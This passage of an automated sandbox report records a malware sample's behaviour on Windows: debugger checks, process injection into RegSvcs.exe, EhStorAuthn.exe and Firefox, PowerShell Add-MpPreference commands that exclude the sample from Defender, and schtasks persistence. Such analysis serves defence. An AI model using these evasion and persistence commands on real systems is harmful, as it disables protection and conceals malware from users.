                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDEB20 mov eax, dword ptr fs:[00000030h]7_2_00EDEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F78B28 mov eax, dword ptr fs:[00000030h]7_2_00F78B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F78B28 mov eax, dword ptr fs:[00000030h]7_2_00F78B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F84B00 mov eax, dword ptr fs:[00000030h]7_2_00F84B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE2CF0 mov eax, dword ptr fs:[00000030h]7_2_00EE2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE2CF0 mov eax, dword ptr fs:[00000030h]7_2_00EE2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE2CF0 mov eax, dword ptr fs:[00000030h]7_2_00EE2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE2CF0 mov eax, dword ptr fs:[00000030h]7_2_00EE2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EACCC8 mov eax, dword ptr fs:[00000030h]7_2_00EACCC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA8CD0 mov eax, dword ptr fs:[00000030h]7_2_00EA8CD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2CCA0 mov ecx, dword ptr fs:[00000030h]7_2_00F2CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2CCA0 mov eax, dword ptr fs:[00000030h]7_2_00F2CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2CCA0 mov eax, dword ptr fs:[00000030h]7_2_00F2CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2CCA0 mov eax, dword ptr fs:[00000030h]7_2_00F2CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED8CB1 mov eax, dword ptr fs:[00000030h]7_2_00ED8CB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED8CB1 mov eax, dword ptr fs:[00000030h]7_2_00ED8CB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA8C8D mov eax, dword ptr fs:[00000030h]7_2_00EA8C8D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE4C59 mov eax, dword ptr fs:[00000030h]7_2_00EE4C59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBAC50 mov eax, dword ptr fs:[00000030h]7_2_00EBAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBAC50 mov eax, dword ptr fs:[00000030h]7_2_00EBAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBAC50 mov eax, dword ptr fs:[00000030h]7_2_00EBAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBAC50 mov eax, dword ptr fs:[00000030h]7_2_00EBAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBAC50 mov eax, dword ptr fs:[00000030h]7_2_00EBAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBAC50 mov eax, dword ptr fs:[00000030h]7_2_00EBAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6C50 mov eax, dword ptr fs:[00000030h]7_2_00EB6C50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6C50 mov eax, dword ptr fs:[00000030h]7_2_00EB6C50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6C50 mov eax, dword ptr fs:[00000030h]7_2_00EB6C50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54C34 mov eax, dword ptr fs:[00000030h]7_2_00F54C34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54C34 mov eax, dword ptr fs:[00000030h]7_2_00F54C34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54C34 mov eax, dword ptr fs:[00000030h]7_2_00F54C34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54C34 mov eax, dword ptr fs:[00000030h]7_2_00F54C34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54C34 mov eax, dword ptr fs:[00000030h]7_2_00F54C34
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe"
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe"
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe"
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe"
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtTerminateThread: Direct from: 0x77D32FCC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtSetInformationThread: Direct from: 0x77D263F9
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtQueryInformationToken: Direct from: 0x77D32CAC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtCreateFile: Direct from: 0x77D32FEC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtOpenFile: Direct from: 0x77D32DCC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtSetInformationProcess: Direct from: 0x77D32C5C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtProtectVirtualMemory: Direct from: 0x77D32F9C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtOpenKeyEx: Direct from: 0x77D32B9C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtResumeThread: Direct from: 0x77D336AC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtMapViewOfSection: Direct from: 0x77D32D1C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtWriteVirtualMemory: Direct from: 0x77D32E3C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtCreateMutant: Direct from: 0x77D335CC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtNotifyChangeKey: Direct from: 0x77D33C2C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtQuerySystemInformation: Direct from: 0x77D32DFC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtReadFile: Direct from: 0x77D32ADC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtAllocateVirtualMemory: Direct from: 0x77D32BFC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtCreateUserProcess: Direct from: 0x77D3371C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtQueryInformationProcess: Direct from: 0x77D32C26
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtResumeThread: Direct from: 0x77D32FBC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtDelayExecution: Direct from: 0x77D32DDC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtQueryAttributesFile: Direct from: 0x77D32E6C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtSetInformationThread: Direct from: 0x77D32B4C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtReadVirtualMemory: Direct from: 0x77D32E8C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtCreateKey: Direct from: 0x77D32C6C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtClose: Direct from: 0x77D32B6C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtAllocateVirtualMemory: Direct from: 0x77D33C9C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtWriteVirtualMemory: Direct from: 0x77D3490C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtOpenSection: Direct from: 0x77D32E0C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtQueryVolumeInformationFile: Direct from: 0x77D32F2C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtTerminateThread: Direct from: 0x77D27B2E
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtAllocateVirtualMemory: Direct from: 0x77D348EC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtAllocateVirtualMemory: Direct from: 0x77D32BEC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtDeviceIoControlFile: Direct from: 0x77D32AEC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | NtQuerySystemInformation: Direct from: 0x77D348CC
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\SysWOW64\EhStorAuthn.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: NULL target: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe protection: read write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: NULL target: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Thread register set: target process: 4076
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Thread APC queued: target process: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 614008
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AB1008
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe"
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe"
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp"
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp69AD.tmp"
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: nufnwZ9IW.exe, 0000000D.00000002.3313215748.0000000001631000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000000.1014075405.0000000001630000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158354600.0000000001A70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: nufnwZ9IW.exe, 0000000D.00000002.3313215748.0000000001631000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000000.1014075405.0000000001630000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158354600.0000000001A70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: nufnwZ9IW.exe, 0000000D.00000002.3313215748.0000000001631000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000000.1014075405.0000000001630000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158354600.0000000001A70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: nufnwZ9IW.exe, 0000000D.00000002.3313215748.0000000001631000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000000.1014075405.0000000001630000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158354600.0000000001A70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Queries volume information: C:\Users\user\Desktop\0t7MXNEfCg.exe VolumeInformation
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
